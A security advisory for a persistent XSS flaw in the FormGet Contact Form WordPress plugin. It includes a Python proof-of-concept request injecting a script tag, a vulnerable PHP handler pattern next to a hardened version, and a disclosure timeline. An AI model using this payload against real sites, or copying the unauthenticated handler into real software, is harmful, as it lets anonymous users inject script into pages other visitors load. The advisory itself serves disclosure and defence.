FormGet Contact Form 1.0 - 4.6, Persistent XSS
Due to exposing an AJAX function to anonymous users by using the ‘nopriv’ method of adding an AJAX action, anonymous users are able to insert arbitrary HTML / Javascript onto the site globally.
Homepage
https://wordpress.org/plugins/formget-contact-form/
CVSS Score
6.4
CVSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 4.7
Proof of Concept
The following Python script will result in arbitrary JavaScript being executed on page load. Any custom HTML content can be inserted into the ‘value’ field, so long as the text ‘sideBar’ exists in the provided data.
import requests

# admin-ajax.php dispatches the 'request_response' action to the plugin's
# handler; because it is registered with the 'nopriv' hook, no login is needed.
url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {
    "action": "request_response",
    # 'sideBar' must appear in the data; the rest is stored and rendered unescaped
    "value": "<!--sideBar--><script>alert('.')</script>"}
r = requests.post(url, data=payload)
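To make the root cause concrete for defenders, the following is an added illustration (hypothetical code written for this advisory, not the plugin's own source) of the handler pattern described above, followed by a hardened version. The option name fg_sidebar_html, the function names and the nonce action are assumed.

```php
<?php
// --- Vulnerable pattern (assumed, for illustration only) ---
// Registering the same handler on the wp_ajax_nopriv_* hook exposes it to
// unauthenticated visitors; the posted HTML is stored and later rendered
// site-wide without any sanitisation.
add_action('wp_ajax_request_response',        'fg_request_response');
add_action('wp_ajax_nopriv_request_response', 'fg_request_response');

function fg_request_response() {
    // No nonce, no capability check, no sanitisation: persistent XSS.
    update_option('fg_sidebar_html', wp_unslash($_POST['value']));
    wp_die();
}

// --- Hardened pattern ---
// 1. Only the authenticated hook is registered (no nopriv variant).
// 2. A nonce ties the request to a page the plugin itself served.
// 3. A capability check restricts the action to site administrators.
// 4. Stored markup is reduced to the tags/attributes wp_kses_post allows,
//    which strips <script>, event handlers and javascript: URLs.
add_action('wp_ajax_request_response', 'fg_request_response_safe');

function fg_request_response_safe() {
    check_ajax_referer('fg_request_response', 'nonce');  // dies on failure

    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }

    $raw   = isset($_POST['value']) ? wp_unslash($_POST['value']) : '';
    $clean = wp_kses_post($raw);
    update_option('fg_sidebar_html', $clean);

    wp_send_json_success();
}

// When echoing the stored value, filter again at output time so a value that
// reached the database by another path cannot execute either.
function fg_render_sidebar() {
    echo wp_kses_post(get_option('fg_sidebar_html', ''));
}
```

The nonce expected by check_ajax_referer is produced on the admin side with wp_create_nonce('fg_request_response') and passed to the script, for example via wp_localize_script.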
Timeline
- 2014-09-22: Discovered
- 2014-09-22: Reported to vendor
- 2014-09-24: Vendor responded with intent to fix
- 2014-09-29: Update requested from vendor
- 2014-09-30: CVE requested
- 2014-10-02: CVE assigned
- 2014-10-06: Update requested from vendor
- 2014-10-06: Vendor responded stating issue has been fixed, but no update available to the public yet. Will re-check in two days
- 2014-10-08: No update available yet to the public – update requested from vendor
- 2014-10-08: Vendor responded, stating update made to 4.6. Fix has been put in place, but version number not incremented. Provided recommendation to increment version number
- 2014-10-10: Vendor releases 4.7 – issue resolved
- 2014-10-17: Advisory released